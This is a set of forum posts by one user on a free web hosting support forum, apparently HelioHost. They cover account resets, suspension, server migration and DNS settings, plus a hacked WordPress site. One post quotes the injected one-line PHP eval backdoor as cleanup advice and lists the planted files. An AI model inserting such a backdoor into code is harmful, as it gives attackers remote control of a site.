danval

Hello KazVee, Thank you very much for responding to this request so quickly. Mail received and account created! Now I'm uploading all the content again, and recreate mail accounts and database. Also, thank you for the backup files (It never hurts to have an extra copy...). Best Regards,

Hello, After a long time, I am going to update my website, but the document root for my account seems not to work. The last time I updated it, was when using cPanel (yes, so long). Now I'm trying to upload a backup from the old site, but I'm facing this same issue: As you advise in that post, for avoid any further problems, the best option is resetting the account. So, could you reset my account to start fresh, and re-upload my website? My account info: Host: tommy User: danval Domain: cerberolabs.es.eu.org Best regards,

Yes, we have been with you for a long time... 😄 A service that works perfectly and is also free of charge... has no competition in the market. Plus we never had any problems with you in all this time. We are very happy! I already have the two accounts created and gained access to Plesk Control Panel. I still need to restore the backup copies (database + Wordpress), but I hope it doesn't take me too long. Again, thank you for all the work you do. And as always, responding very quickly and solving any problem. Best Regards,

Hi wolstech, Thank you for give me all the information about the reason why my account has been suspended. I have been a user of your hosting service for quite some time. A long time ago, I had requested the creation of a second account for someone who lives with me and we share computers. To ensure that the accounts did not become inactive, we logged into both at the same time for convenience. For that reason, maybe the account would appear as more than account per user. For reference, this is the post where I indicated this situation, and which was answered by Byron: I always used the email you sent as a reminder of the month to log in before the account became inactive. So when I didn't receive it anymore, I missed logging in and that's why my account expired. The content we had hosted with you were two personal blogs made in Wordpress with low traffic. Having said that, can we continue to retain both accounts? Or will it be detected again as a violation of the terms of service and therefore suspended? Sorry for any inconvenience this has caused you. Best Regards,

Hello, Today, I tried to log in my Heliohost account, but I got a message: "No account found with that username". I don't remember the last time I logged in, but I didn't get any email from inactivity since some time... So maybe this account suspension may be legitimate. The required info is this: Username: danval Server: Tommy Main domain: cerberlobas.es.eu.org Can I recover my account? Best regards,

Maybe a 0-day attack? I update Wordpress to 4.9.7 on 5th July.

Thank you Wolstech. This is the most strange thing. I can tell you that my password was very strong (mixed letters an numbers, and not a common word). So a reverse hash could be imposible. It would be interesting to determine if those affected are only those who have a Wordpress installed. I notice the problem yesterday (Friday 20th at 14:53PM CEST) because Wordfence mailed me about an unexpected administrator login. Other account that was compromised was raqbul (belongs to a member of my family) at the same time.

Yes, this CMS is a headache. I had Wordpress up to date, and they still managed to attack it with success. If you don't have a backup, the best option is: Do a fresh install. Install the Wordfence plugin. It's free and can help you in this cases. Up to date regularly: plugins, themes and core. Do regularly backups.This is the best option to fight against attacks, although they will continue to happen. And some of them with success Anyway, this surely it is due to a hole in Wordpress, but how have they managed to change the cPanel password? This is the most frustrating thing I that I found so far...

In "index.php", remove this code at the start of file: <?php eval($_POST['475454656']); ?> The "php.ini" must be deleted because not belongs to Wordpress. I think these are the only changes that were made, but the best solution is restore a recent full backup of site (files and database) if you have one. Also, this don't prevent from the hack will happend again in the future, because it's neccesary to known where is the security hole... .

Yes, the 'AnonymousFox' was the same administrator user rename as mine. I have installed Wordfence on my Wordpress site. Thanks to the plugin I found out that an suspicious administrator login was made. I have done and scan from Wordfence, and I have the Wordpress installation modified: New file: wp-admin/2125719357.php New file: wp-content/1205929475.php New file: wp-admin/php.ini Modified file: index.php

Hi, The same thing was start happening to me yersteday. I have a Wordpress site on Tommy and I couldn't login either cPanel or Wordpress administration. After reset my password, I could login to cPanel. I checked Wordpress database and I discovered that the admin user login was renamed and password changed. These changes were not made from me, so I think the site was been hacked (and so my cPanel account). I though this was only my problem, but a family member who has a Wordpress blog on HelioHost too, suffered the same problem. The Wordpress admin user was renamed to the same login as mine and access to cPanel was not possible. Then, we had to reset the cPanel password to fix it. Seemingly the attack only affects to the passwords, not files and the database is in good state. Anyway, I plan to restore a full backup of the site to ensure that everything is good. Anyone has the same problem? Best Regards,

Yes, I manage to restore the website and all it's working again. Many thanks for you support Krydos

I use EU.ORG, and in the past, I had problems setting nameservers in this domain provider. Because this I have an A record. As you say, I have changed the values of NS record to ns1.heliohost.org and ns2.heliohost.org, and delete A record. Time to wait for replication. Thank you again for your invaluable help.

Thank you Krydos! I have two questions: I've noticed that my forum username has changed to "danval2". Is it possible rename it to "danval"? In the DNS configuration for my domain, I have an A record pointing to 216.218.192.170. I think this IP was Stevie log time ago, although now it have another IP (65.19.143.2). Since this server is down, I changed the A record for my domain to point to Tommy (65.19.143.6). Is this correct?Best regards.

Hello, Because the current problems with Stevie, I must migrate my account to Tommy. I sent you a donation and received the invitation email to Tommy. But before I create an account in this server, an admin must delete my account on Stevie, right? This is my account info: Username: danvalDomain: cerberolabs.es.eu.orgServer: stevieTransaction ID: 0J528184E4869705KI'll transfer user, domain, email, database and files to this new account (I have a recent backup). On the other hand, at my home there is another person who also had a blog hosted on Stevie. This person don't have PayPal account. If I make another donation, could you send the invitation to Tommy to a different email than the transaction (I'll specify it in transaction message)? Thank you so much. Best regards.